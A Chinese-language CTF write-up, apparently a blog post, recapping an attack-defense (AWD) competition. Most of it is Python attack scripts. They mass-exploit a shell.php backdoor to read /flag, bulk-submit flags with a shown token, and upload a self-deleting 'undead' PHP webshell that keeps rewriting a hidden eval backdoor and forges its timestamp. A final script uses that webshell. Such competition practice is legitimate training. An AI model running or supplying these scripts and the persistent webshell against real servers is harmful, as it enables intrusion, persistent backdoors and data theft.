丝路杯

这是一个对丝路杯的总结，主要是awd攻防。从这次比赛中找到不足。（之后有补充的话会继续补充）

这次的check很抽象，检测你有没有修改后门文件，修改了，直接异常，只能删除后门文件（无异常）。而且对通防没有限制，虽说文件里明确说明了，但是裁判和技术人员居然不知道规则，现场查看规则。靶机没有重置功能，但文件里说有

我们是第一个找到后门文件的，拿到了一血，但脚本没准备好，是现场手搓的,导致awd惨不忍睹。

下面是代码：

得到flag并写入文件的代码

import requestsips = open("./ip.txt","r")
url = "/shell.php"for ip in ips:urlip = ip.strip()+urldata={"shell":"system('cat /flag')"}try:response = requests.post(url=urlip, data=data, timeout=3)if "flag" in response.text:print("Found flag:", response.text)with open("flag.txt", "a") as file:file.write(response.text + "\n")except requests.RequestException as e:print(f"Error requesting {urlip}: {e}")ips.close()

批量提交flag的代码：

import requestsurl = "http://democtf.yanwuting.cn/api/v1/awd/answer?evt=acefcc4d-a9cb-4d4a-a75d-7fb7fea5018e"
token = "1792049566158509911"with open("flag.txt","r") as flags:for flag in flags:flag = flag.strip()# 构造请求数据data = {"flag": flag,"token": token}try:# 发送POST请求response = requests.post(url, data=data, timeout=3)# 打印提交结果print(f"提交flag: {flag}，响应状态码: {response.status_code}，响应内容: {response.text}")except requests.exceptions.RequestException as e:print(f"提交flag: {flag} 时发生错误: {e}")

上传不死马代码：

import requests
import base64ips = open("./ip.txt", "r")
url_suffix = "/shell.php"# 要上传的文件内容
file_content = '''<?phpignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '.kangkang.php';$code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e832627b4f6"){@eval($_POST["cmd"]);} ?>';while (1){file_put_contents($file,$code);system('touch -m -d "2018-12-01 09:10:12" .kangkang.php');usleep(1);}
?>'''# 将内容进行base64编码，避免特殊字符问题
encoded_content = base64.b64encode(file_content.encode()).decode()for ip in ips:ip = ip.strip()if not ip:continueurlip = ip + url_suffixprint("Testing:", urlip)# 使用base64解码并写入文件data = {"shell": f"echo '{encoded_content}' | base64 -d > /var/www/html/.kangkang.php"}try:response = requests.post(url=urlip, data=data, timeout=5)print("Upload response:", response.text)# 验证文件是否上传成功verify_data = {"shell": "ls -la /var/www/html/.kangkang.php && cat /var/www/html/.kangkang.php | head -5"}verify_response = requests.post(url=urlip, data=verify_data, timeout=5)if ".kangkang.php" in verify_response.text:print("File uploaded successfully!")url2 = ip+".kangkang.php"response2 = requests.get(url=url2, timeout=5)print(response2.status_code)except requests.RequestException as e:print(f"Error requesting {urlip}: {e}")ips.close()

利用不死马

import requestswith open("ip.txt","r") as ips:for ip in ips:url=ip.strip()+"/.kangkang.php?pass=test"data={"cmd":"system('cat /flag')"}try:response = requests.post(url=url, data=data, timeout=3)if "flag" in response.text:print(f"Found flag at {ip}: {response.text}")with open("flag.txt", "a") as file:file.write(response.text + "\n")else:print(f"No flag found at {ip}, response: {response.text[:100]}...")  # 只显示前100个字符except requests.RequestException as e:print(f"Error requesting {url}: {e}")